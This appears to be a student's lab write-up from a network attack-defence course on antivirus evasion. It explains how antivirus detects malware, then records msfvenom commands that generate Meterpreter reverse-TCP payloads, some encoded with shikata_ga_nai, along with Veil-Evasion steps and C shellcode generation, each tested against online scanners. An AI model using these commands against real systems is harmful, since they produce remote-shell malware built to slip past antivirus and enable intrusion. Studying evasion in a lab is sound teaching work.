• 20145321《网络攻防》免杀原理与实践


    20145321《网络攻防》 免杀原理与实践

    基础问题回答

    (1)杀软是如何检测出恶意代码的?

    • 某只鸟的行为举动都像鸭子,我们就把这只鸟称为鸭子。对于恶意代码也一样,如果它有恶意行为,杀软就会把这程序看作恶意软件,从而查杀。
    • 另外杀软通过其特征码库,看程序是否含有特征码被匹配,从而判断此程序是否为恶意代码。

    (2)免杀是做什么?

    • 免杀是让恶意代码不会被杀毒软件检测查杀的技术。

    (3)免杀的基本方法有哪些?

    • 加壳改壳
    • 加花指令
    • 修改内存特征码

    实践过程记录

    msfvenom直接生成meterpreter可执行文件

    1.用命令生成meterpreter可执行文件

    2.用ncat将文件传到windows后用virscan进行检测

    Excuse me?难道我就这样做成了免杀实验吗?…然而机智的我是不会被它蒙骗的,一定有什么地方不对!

    原来传了个0 byte的文件,尴尬……那我们重新来一次。

    重新生成了try2.exe ,再次用virscan网站来检测

    检测结果如下:

    Msfvenom使用编码器生成meterpreter可执行文件

    1.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -b ‘x00’ LHOST=攻击主机ip LPORT=监听端口 -f exe > xxx.exe

    命令生成一次加壳的可执行文件。

    再次检测,但好像并没什么用,查杀概率还是一样:

    2.使用命令 msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -i 10 -b ‘x00’ LHOST=攻击者ip LPORT=监听端口 -f exe > xxx.exe

    编码加壳10次看看效果

    效果差不多,感觉依然鸡肋。

    使用Veil-Evasion生成可执行文件

    直接在终端输入veil-evasion打开软件

    输入命令 use python/meterpreter/rev_tcp set LHOST xxx... generate xxx...

    继续检测:

    被检测到的概率减少了一半。

    用Shellcode编程

    使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=监听端口号 -f c 生成一个shellcode数组

    再次用virscan检测:

    可以看到被检测到的概率降低了很多。

     

  • 相关阅读:
    报表中的图形是怎么做出来的?如何在其中实现地图?
    多维分析的本质计算是什么?能做什么又不能做什么?
    报表工具对比选型系列用例——多源分片报表
    报表工具怎样适应移动端?
    报表工具怎样适应移动端?
    互联网技术部门该如何管理
    更好用 更简单的Java缓存框架 jscache
    古人是怎么排行
    Spark ML 机器学习之Word2Vec
    Spark ML之高级数据源
  • 原文地址:https://www.cnblogs.com/5321z/p/6624154.html
Copyright © 2020-2023  润新知